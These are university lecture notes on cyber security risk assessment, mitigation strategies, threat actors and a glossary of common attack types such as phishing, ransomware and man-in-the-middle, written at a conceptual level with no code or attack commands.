Technical University of Mombasa

Session 5: Cyber Security Risks and Vulnerabilities

Session Objectives
- Basics of risk management
- Operational threat environments
- Classes of attacks

5.1 Introduction
Recall
A vulnerability is an exploitable weakness resulting in loss. They are continuously being
discovered. Common discovery techniques include vulnerability scans and penetration tests.
Organizations must understand cybersecurity assets and where they reside (physical and
logical). Taking advantage of a vulnerability is called an exploit.

Risk Management is simply to look at what could go wrong - and then decide on ways
to prevent - or minimize - these potential problems. It encompasses three processes –
risk assessment, risk mitigation and evaluation.

We all carry out informal risk management numerous times in the course of a day
without even realizing it:
Every time we cross a street, we stop to weigh the risk of rushing in front of
oncoming traffic, waiting for the light to change, using the crosswalk, etc. Our ability
to analyze the consequences of each decision is risk assessment. What we decide to do
after performing that quick analysis is risk mitigation based on proper early training
and our experience of crossing a road. We may decide to wait for the traffic light and
use the cross walk which greatly reduces the potential risk, we may follow someone
else across the street allowing them to make the decision for us, or we may simply
choose not to cross the street. These decisions are a result of our risk assessment of the
situation. If you make it across the street you remember what worked. If anything
went wrong such as a honked horn or brakes squealing, you should evaluate if another
choice would have been better.

Below are important definitions for terms that are used in this topic.

Risk: The probability of suffering harm or loss. It refers to an action, event or a natural
occurrence that could cause an undesirable outcome, resulting in a negative impact or
consequence.

1
Risk Assessment: The process of identifying threats to information or information
systems, determining the likelihood of occurrence of the threat, and identifying system
vulnerabilities that could be exploited by the threat.
Risk Management: The process of taking actions to assess risks and avoid or reduce
risk to acceptable levels.

As a manager the issues of risk assessment may seem difficult and the right decisions
for risk management challenging; but the principles remain the same. It is your
responsibility to make the best decision based on the information at hand. A well-
structured risk management methodology, when used effectively, can help.

This is an ongoing process of evaluating threats and vulnerabilities, and then

establishing an appropriate risk management program as part of your larger
organization’s risk management program to mitigate potential monetary losses and
harm to an organization's reputation.
For information security, the program should be appropriate for the degree of risk
associated with the organization's systems, networks, and information assets. For
example, organizations accepting online payments are exposed to more risk than
websites with only static information.

5.2 Risk Assessment

Is the process of identifying threats to information or information systems;
determining the likelihood of occurrence of the threat, and identifying system
vulnerabilities that could be exploited by the threat.

Risk assessment is the first phase in the risk management process. Risk is assessed by
identifying threats and vulnerabilities, and then determining the likelihood and
impact for each risk.

RISK ASSESSMENT ORIENTATIONS

orientation description
Asset , and then potential threats to those assets are analyzed. vulnerabilities
are identified that may be exploited to access the asset.
Threat potential threats are determined first, andthen threat scenarios are
developed. based on the scenarios, vulnerabilities and assets of interest
to the adversary are determined in relation to the threat.
Vulnerability Vulnerabilities and deficiencies are identified first, then the exposed
assets and potential threat events are determined.

It is important to designate an individual or a team, who understands the

organization’s mission, to periodically assess and manage information security risk.
The designated individual will work with others from the organization to understand
the business program component of information assets, the technology involved, and
the impact as well as the costs of managing the risk.
Risk assessment involves:

2
i. Classify information
Before an organization can assess the risk it must first classify the information
assets in the organization. Classification is the designation given to information
from a defined category on the basis of its sensitivity. Information assets include
all categories of information (automated and non-automated), including (but not
limited to) data contained in records, files, and databases. Information assets
usually include: public records mission-critical systems, customer interfaces,
internal tools, source code, and confidential records. The organization is
responsible for protecting the confidentiality, integrity and availability of the
information assets. The value of an asset will be determined by the information
owner - an individual or a group of individuals responsible for making
classification and control decisions regarding use of information, especially PPSI.

ii. Identify threats

A threat is a force, organization or person, which seeks to gain access to, or
compromise, information. By looking at the nature of the threat, its capability and
resources, one can assess it, and then determine the likelihood of occurrence, as in
risk assessment. A threat can be assessed in terms of the probability of an attack.

There are many types of information security threats, some examples are listed
below1:
• Internal (e.g., malicious or unaware employees);
• Mobile (e.g., attackers who steal remote systems which, in turn, provide access
to information);
• Physical (e.g., attackers who steal computers or enter server rooms, file
cabinets, or offices);
• Natural (e.g., fire, floods, and earthquakes resulting in electrical outages,
equipment and hardware failures);
• Network (e.g., attackers who try to compromise systems exposed on a public
network or try to spoof or imitate remote systems);
• Social (e.g., attackers who try to fool employees into revealing information
through phishing);
• Malicious (e.g., viruses, worms, and Trojan horses, code that may damage,
reveal, or capture information).

It is important to be aware of threats to your organization’s information in order to

prevent compromise to that information’s confidentiality, integrity and availability.
Information security threats must be identified at as many levels as possible.

iii. Identify vulnerabilities

Vulnerabilities must be identified. Vulnerabilities are weaknesses, in a system or
facility holding information, which can be exploited to gain access or violate system
integrity.
Vulnerabilities can be assessed in terms of the means by which the attack would be
successful, such as:
• Tapes lost during transfer to a storage facility (availability issue).

3
 • Information read by an unauthorized individual(s) (confidentiality issue).
• Software and hardware not maintained at current patch levels allow
unauthorized access via the Internet resulting in a breach of confidential
information (confidentiality, integrity and/or availability issues).
• Unintentional loss of data via theft resulting in identity theft (confidentiality
issue).
• Accidental or intentional deletion or modification of information (availability
and integrity issues).
• Unsecured computers and portable devices such as blackberries, laptops, or
USB devices (confidentiality, integrity and availability issues).

iv. Analyse The Risk To Information Assets

There are inherent risks involved in containing and transferring information.
Information is subject to intentional and unintentional actions by other people or
systems. If information is confidential, there may be unauthorized people who want
to see it, such as competitors or disgruntled or curious employees. People may try
to break into the devices containing the information or try to intercept the
information during transfer. People may also receive confidential information
unknowingly and completely by accident. Furthermore, information systems can
be maliciously or accidentally damaged. Information security breaches like these
can seriously hurt an organization.

Risk for a given asset can be provided in the most general form using the following
equation:

Risk = (Probability of a threat occurring against an asset) x (Value of asset)

In other words, the higher the likelihood of a threat occurring and affecting an asset
and the higher the value of that asset, the higher the risk. If a threat has little or no
chance of occurring, or if the asset has no value, the risk is either very low or zero.
Since information assets within an organization most likely hold some level of
value, risk management will involve reducing the likelihood of threats from
occurring2.

v. Select A Method
In order to quantify risk in some fashion, an organization will need to develop a
method of measuring risk so that this information can be communicated with others.
There are many methodologies to pick from; each organization will need to determine
which is best. Ultimately, the organization will need to understand its information
security risks. The question “What information assets are most at risk to compromise
or damage and what can happen to these assets?” needs to be answered.

The question may best be answered by assigning a value and acceptable risk level to
each asset. The value of an asset varies from asset to asset and from organization to
organization. The level of risk depends on actions taken by the organization. For
example if backups are done and secured, the loss (unavailability) of an electronic

4
copy may be a low risk. One way that you might measure risk is shown in the
following illustration, while presented as a methodology, can be modified to meet
your needs. We will expand this illustration later in this document.

To assist the organization in making information security risk assessment decisions it

will help to ask some questions based on confidentiality, integrity and availability.
Additional resource information is found at the end of this document.

vi. Summarise and Communicate Risk

Risk has to be measured for each information asset, and for the organization as a
whole, and then communicated so decisions can be made to manage the risk.

Benefits of Risk analysis

Risk analysis provides the following benefits:
• Improve awareness: Discussing issues of security can raise the general level of
interest and concern among employees.
• Identify assets, vulnerabilities and controls:
- Some companies may be unaware of their computing assets and the
vulnerabilities associated with those assets, and a systematic analysis produces a
comprehensive list of assets and vulnerabilities.
• Improve basis for decisions:
- Controls reduce productivity through increased overhead and inconvenience
to users.
- Some controls can not be justified from the perspective of the protection they
provide. Also, some risks are so serious that they warrant a continuing search
for more effective controls. Thus, the seriousness of the risk affects the
desirability of controls.
• Justify expenditures for security: Some security mechanisms or controls are
very expensive without an obvious benefit.
- A risk analysis can help identify instances that are worth the expense of a major
security mechanism.

5.3 Risk Mitigation / Handling

Risk handling is the application of controls, and counter measures appropriate to the
risk, subject to constraints – such as available funds.
Risk handling strategies include the following:
• Risk Avoidance: Can the risk be avoided? This may mean setting IT systems
away from obviously dangerous/insecure areas, deciding against
centralization of IT resources, telecommuting, etc.
• Risk Retention: The risk retention strategy will be applied only where the
organization feels that it can bear with the expected losses. This is applied to
risks that have been identified to have low associated costs.
• Risk Reduction:
Risk reduction is the policy of introducing controls and counter measures to
reduce the likelihood of occurrence or reduce the losses that will result

5
 violation of security.
• Risk Transfer: This strategy passes over the costs resulting from the violation
of security to a third party (insurance policies, maintenance contracts, standby
agreements, etc)

Below is a summary of the severity of risk and the risk handling approach:

Threat severity Risk Handling

Strategy
Total calamities Risk avoidance
Risk transfer
Low-loss threats Risk retention
Others Risk retention
Risk transfer

5.4 Cyber Threat Environment

Consists of:
a) Cyber Threat
A cyber threat is an activity intended to compromise the security of an information
system by altering the availability, integrity, or confidentiality of a system or the
information it contains.
The cyber threat environment is the online space where cyber threat actors conduct
malicious cyber threat activity.

b) Cyber Threat Actors

Cyber threat actors are states, groups, or individuals who, with malicious intent, aim
to take advantage of vulnerabilities, low cyber security awareness, and technological
developments to gain unauthorized access to information systems in order to access
or otherwise affect victims’ data, devices, systems, and networks. The globalized
nature of the Internet allows these threat actors to be physically located anywhere in
the world and still affect the security of
information systems in Kenya.

c) Motivations
Cyber threat actors can be categorized by their motivations and, to a degree, by their
sophistication. Threat actors value access to devices, processing power, computing
resources, and information for different reasons. In general, each type of cyber threat
actor has a primary motivation.

6
d) Sophistication
Cyber threat actors are not equal in terms of capability and sophistication, and have a
range of resources, training, and support for their activities. Cyber threat actors may
operate on their own or as part of a larger organization (i.e., a nation-state intelligence
program or organized crime
group). Sometimes, even sophisticated actors use less sophisticated and readily
available tools and techniques because these can still be effective for a given task and/
or make it difficult for defenders to attribute the activity.

Nation-states are frequently the most sophisticated threat actors, with dedicated
resources and personnel, and extensive planning and coordination.

Cybercriminals are generally understood to have moderate sophistication in

comparison to nation-states. Nonetheless, they still have planning and support
functions in addition to specialized technical capabilities that affect a large number of
victims.

Threat actors in the top tier of sophistication and skill, capable of using advanced
techniques to conduct complex and protracted campaigns in the pursuit of their
strategic goals, are often called advanced persistent threats (APT).
This designator is usually reserved for nation-states or very proficient organized crime
groups.

Hacktivists, terrorist groups, and thrill-seekers are typically at the lowest level of
sophistication as they often rely on widely available tools that require little technical
skill to deploy. Their actions, more often than not, have no lasting effect on their
targets beyond reputation.

7
Insider threats are individuals working within their organization who are particularly
dangerous because of their access to internal networks that are protected by security
perimeters. Access is a key component for malicious threat actors and having
privileged access eliminates the need to employ other remote means. Insider threats
may be associated with any of the other listed types
of threat actors, but can also include disgruntled employees with motive.

e) Cyber Threat Activities

Cyber threat actors conduct malicious cyber threat activity by exploiting technical
vulnerabilities, employing social engineering techniques, or by manipulating social
media. A determined and capable adversary will often carefully select the technique
most likely to result in successful exploitation after conducting reconnaissance against
their target and may use a range of techniques to achieve their goal. The majority of
threat actors, however, simply cast a wide net
in hopes of exploiting any unsecure network or database.

Technical vulnerabilities are weaknesses or flaws in the design, implementation,

operation, or management of an information technology system, device, or service
that provides access to cyber threat actors. For example, a threat actor may attempt to
install malicious software, called malware, or take advantage of existing flaws to
exploit the targeted system. In addition to installing malware, threat actors also use
tools that directly exploit specific technical vulnerabilities.

Social engineering
Exploitation methods that target human vulnerabilities, such as carelessness and trust,
are collectively known as social engineering. Threat actors use social engineering to
trick an individual into inadvertently allowing access to a system, network, or device.
Phishing and spear-phishing are common social engineering techniques. (Please see
Annex A: The cyber threat toolbox for more information).
Cyber threat actors can also manipulate social media in order to influence public
discourse. With a thorough understanding of how traditional media and social media
work – and how individuals consume information – cyber threat actors can promote
their message to broader target audiences at a relatively low cost.
They can do this by masquerading as legitimate information providers, hijacking
social media accounts, or creating websites and new accounts.

Attribution
is the act of accurately determining the threat actor responsible for a particular set of
activities. Successful attribution of a cyber threat actor is important for a number of
reasons, including network defence, law enforcement, deterrence, and foreign
relations. Cyber threat actors attempt to evade attribution through obfuscation.

Obfuscation
Refers to the tools and techniques that threat actors use to hide their identities, goals,
techniques, and even their victims. In order to avoid leaving clues that defenders
could use to attribute the activity, threat actors can use either common, readily

8
available tools and techniques or custom-built tools that covertly send information
over the Internet.

False flags,
Sophisticated threat actors can also use false flags, whereby an actor mimics the
known activities of other actors with the hope of causing defenders to falsely attribute
the activity to someone else. For example, a nation-state could use a tool believed to
be used extensively by cybercriminals.

The ability of cyber threat actors to successfully obfuscate their actions varies
according to their level of sophistication and motivation. In general, more
sophisticated actors, such as nation-states and competent cybercriminals, will be more
adept at – and have more reasons for – obfuscation and will be more successful in
avoiding attribution than less sophisticated threat actors.

5.5 Types of Cyber Attacks

Also known as THE CYBER THREAT TOOLBOX

It is beyond the scope of this Lesson Notes to present all cyber capabilities that threat
actors could deploy. Below is a non-exhaustive list of common tools and techniques
that are used by threat actors. For simplicity, they are listed alphabetically and are not
ranked according to frequency or impact.

Adware
Adware is short for advertising software and its main objective is to generate revenue
by delivering tailored online advertisements. As such, browser-based and application-
based adware tracks and gathers user and device information, including location data.
Adware can lead to exploitation of security settings, users, and systems. Malware,
man-in-the-middle, and spyware are often associated with this tool.

Backdoor
A backdoor is a point of entry into a user’s system or computer, bypassing
authentication measures, encryption, or intrusion detection systems. Once threat
actors have this remote access, they can steal information, install malware, or control
the device’s processes and procedures. Backdoors are often deliberately created for
troubleshooting, software updates, or
system maintenance. Threat actors can use these legitimate backdoors for malicious
purposes.

Birthday attack
Birthday attacks are made against hash algorithms that are used to verify the integrity
of a message, software or digital signature. A message processed by a hash function
produces a message digest (MD) of fixed length, independent of the length of the input
message; this MD uniquely characterizes the message. The birthday attack refers to
the probability of finding two random messages that generate the same MD when
processed by a hash function. If an attacker calculates same MD for his message as the

9
user has, he can safely replace the user’s message with his, and the receiver will not
be able to detect the replacement even if he compares MDs.

Bots and Botnets

A bot, also known as a zombie, is an Internet-connected device (e.g., computers,
mobile, and Internet of Things devices) that is infected with malware without the
owner’s awareness and is remotely controlled by a threat actor to perform a specific
malicious task. A botnet is a grouping of these compromised devices that are
coordinated by a threat actor.

Botnets typically expand by scanning the online environment and finding vulnerable
devices that can provide computing power and additional capacity. Botnets are used
for a multitude of purposes, such as to conduct distributed denial of service (DDoS),
spread ransomware and malware, conduct ad fraud campaigns, send spam, divert
traffic, steal data, and manipulate, amplify, and/or suppress social media and web
platform content in order to impact public discourse.

Code Injection
Code injection is when threat actors introduce malicious code into a computer
program by taking advantage of a flaw in a program’s functionality instructions or in
the way it interprets data input. Two common code injection techniques are cross-site
scripting (XSS) and Structured Query Language (SQL) injection.

Cryptomining
Cryptomining or cryptocurrency mining is when software programs leverage
computing resources to generate or “mine” a cryptocurrency, an activity that rewards
the miner with a small fraction of the mined cryptocurrency as a fee for the mining
service. Cryptojacking is when a threat actor covertly exploits a victim’s device (e.g.,
computers, mobile, and Internet of Things devices) for the unauthorized mining of
cryptocurrency. In order to increase efficiency (e.g., revenue) a threat actor can
leverage a botnet of compromised devices. Such malware is typically delivered by
visiting a compromised website, installing an application, or through phishing.

(Distributed) Denial of Service

Denial of service (DoS) is a technique by which a threat actor makes an attempt at
disrupting the normal activities of a specific host (e.g., website, server, network,
Internet of Things device) by overwhelming it with Internet traffic, also known as
requests. The overall objective is to render the host unavailable for legitimate requests
from users and render the targeted system dysfunctional. Distributed denial of
service (DDoS) adds a level of complexity by introducing traffic flooding from
multiple sources (e.g., from a botnet). This larger-scale activity makes it much harder
to stop and very difficult to distinguish legitimate user traffic from malicious traffic.

10
Distributed denial of service

Drive-By Exploit and Watering Hole

A drive-by exploit refers to malicious code that a cyber threat actor has placed on a
website without the website host’s knowledge; the malicious code attempts to
compromise the devices of any user who visits the website. A watering hole is a
website frequented by individuals specifically targeted by a cyber threat actor that is
compromised with an exploit.

Exploits and Exploit Kits

An exploit is malicious code that takes advantange of an unpatched vulnerability. An
exploit kit is a collection of multiple exploits that affect unsecure software
applications. Each exploit kit is customized to search for specific vulnerabilities and
execute the corresponding exploit for the vulnerability it finds. If a user visits a website
hosting an exploit kit, the exploit kit will test its repository of exploits against the
software applications on the user’s device and deploy the exploit that fits the user’s
vulnerability.
Man-In-The-Middle
Man-in-the-middle (MITM) is a technique by which a threat actor intercepts a
communication between two parties, such as a victim and a web server, without the
victim’s knowledge. The victim is under the illusion that they are communicating
directly and securely with a website.
MITM enables threat actors to monitor communications, reroute traffic, alter
information, deliver malware, and acquire personally identifiable or other sensitive
information. MITM can be achieved via several techniques such as phishing,
pharming, typo-squatting, Wi-Fi eavesdropping, and SSL hijacking.

Password Cracking

11
Password cracking is an attempt to directly access accounts. Two common forms of
password cracking are brute force and dictionary-based. Brute force cracking uses an
exhaustive number of randomly generated passwords to attempt to gain access, while
dictionary-based cracking checks against a list of commonly used passwords.

Pharming
Pharming is a technique used to redirect traffic from a legitimate website to a
malicious one. This deception can be achieved by modifying the user’s system settings
or by exploiting vulnerabilities in the domain name system (DNS) server software,
which is responsible for resolving URLs into IP addresses. Contrary to typo-squatting
(see below), where a user mistypes a website address and is redirected to an
illegitimate website, pharming can redirect a user who properly types the URL. At a
quick glance, the illegitimate website may appear to be the legitimate website and can
be used to deliver malware and acquire personally identifiable or other sensitive
information.

Phishing, Spoofing, Spear-Phishing, and Whaling

Phishing is a common method by which threat actors disguise themselves as a
trustworthy entity with the intent to lure a large number of recipients into providing
information, such as login credentials, banking information, and other personally
identifiable information. Phishing is an example of a social engineering technique and
is mainly conducted through email spoofing and text messages. Users become victims
when they open malicious attachments or click on embedded links.
Spoofing is the act of masking or forging a website, email address, or phone number
to appear as if it originates from a trusted source. After receiving a phishing message,
the victim can be enticed into giving away personal, financial, or other sensitive
information or clicking on a link or attachment, which can infect a device with
malware.
Spear-phishing phishing occurs when a cyber threat actor sends a personally tailored
phishing message to a more precisely selected set of recipients or even a single
recipient. Spear-phishing relies on social engineering, using details that are believable
to the victim as originating from a trusted source.
Whaling refers to spear-phishing targeted at senior executives or other high profile
recipients
with privileged access and authorities.

Ransomware
Ransomware is malicious software that, in many cases, restricts access to a computer
or a device and its data by encrypting its content and demanding that a ransom be
paid, usually via a cryptocurrency such as bitcoin, in order for the victim to regain
access to systems and information. Ransomware can also lock systems in various ways
without the use of encryption, disrupting device performance. Actors may threaten to
expose sensitive, personal, or embarrassing information unless a ransom is paid.
Ransomware is typically installed using a
trojan or a worm deployed via phishing or by visiting a compromised website.

12
Rootkit
A rootkit is a malicious application that is designed to covertly provide a threat actor
with “root” or administrative privileged access to software and systems on a user’s
device. A rootkit provides full control, including the ability to modify software used
to detect malware. Rootkit installation can be achieved in many ways, including
through password cracking, social engineering, and leveraging a bug or design flaw
that can grant privileged access to a user’s system or device.

Spyware
Spyware is malicious software used to track a user’s digital actions and information
with or without the user’s knowledge or consent. Spyware can be used for many
activities, including keystroke logging, accessing the microphone and webcam,
monitoring user activity and surfing habits, and capturing usernames and passwords.

SSL Hijacking
Secure Sockets Layer (SSL) hijacking is a technique by which a threat actor is able to
intercept and redirect an unsecure connection between a victim and a server trying to
establish a secure connection. The threat actor is then able to provide a secure
connection instead of the intended website, which enables them to intercept and
compromise the communication without the victim’s knowledge (see man-in-the-
middle above). SSL hijacking is not about breaking the security provided by SSL, but
rather, it inserts a compromised bridge between the non-encrypted and encrypted
part of a communication.

Typo-Squatting
Typo-squatting is a technique by which a threat actor registers domain names that
have very similar spelling to and can be easily confused with a legitimate domain
address. Typo-squatting is also known as URL hijacking and enables a threat actor to
redirect a user who incorrectly typed a website address to an alternative look-alike
domain under the actor’s control. The new domain can then deliver malware and
acquire personally identifiable or other sensitive information. Luring a victim to a
hijacked URL can also be achieved through phishing techniques.

Virus, Worm, Payload and Trojan

Malware is commonly delivered through the use of viruses, worms, and trojans with
far-reaching consequences.
A virus is an executable and replicable program that inserts its own code into
legitimate programs with the objective of damaging the host computer (i.e., deleting
files and programs, corrupting storage and operating systems).
In its simplest state, a worm is a computer program meant to self-replicate and spread
to other computers to drain a system’s resources.
Additionally, just like a virus, a worm has the ability to propagate code that can
damage its host. Such code is referred to as a payload (e.g., the ability to encrypt files
in ransomware and the installation of system backdoors that enable remote access).

13
A trojan is a malicious program disguised as or embedded within legitimate software
that has similar objectives to viruses and worms, but, unlike either of them, does not
replicate or propagate on its own

WI-FI EAVESDROPPING
Wi-Fi eavesdropping is when a threat actor installs what looks like a legitimate Wi-Fi
access point in a public area. Once users connect to such an access point, often referred
to as a malicious hotspot or a rogue access point, they fall victim to man-in-the-middle
(MITM). Such activity allows a threat actor to monitor communications and to acquire
personally identifiable or other sensitive information.

Wiper
A wiper is malware designed to completely wipe the hard drive of infected devices.

Zero-Day Vulnerabilities and Zero-Day Exploits

Unmitigated vulnerabilities not in the public domain and known only to a few people
are referred to as zero-day vulnerabilities. An exploit against a zero-day vulnerability
is called a zero-day exploit.

Types of Vulnerabilities CAUSE Cybersecurity Examples

Technical Errors in design, •Coding errors
implementation, •Inadequate passwords
placement or •Open network ports
configuration •Lack of monitoring

Process Errors in operation •Failure to monitor logs

•Failure to patch software
Organizational Errors in management, •Lack of policies
decision-making, •Lack of awareness
planning or ignorance •Failure to implement controls
Emergent Interactions between, or •Cross-organizational failures
changes in, environments •Interoperability errors
•Implementing new technology

14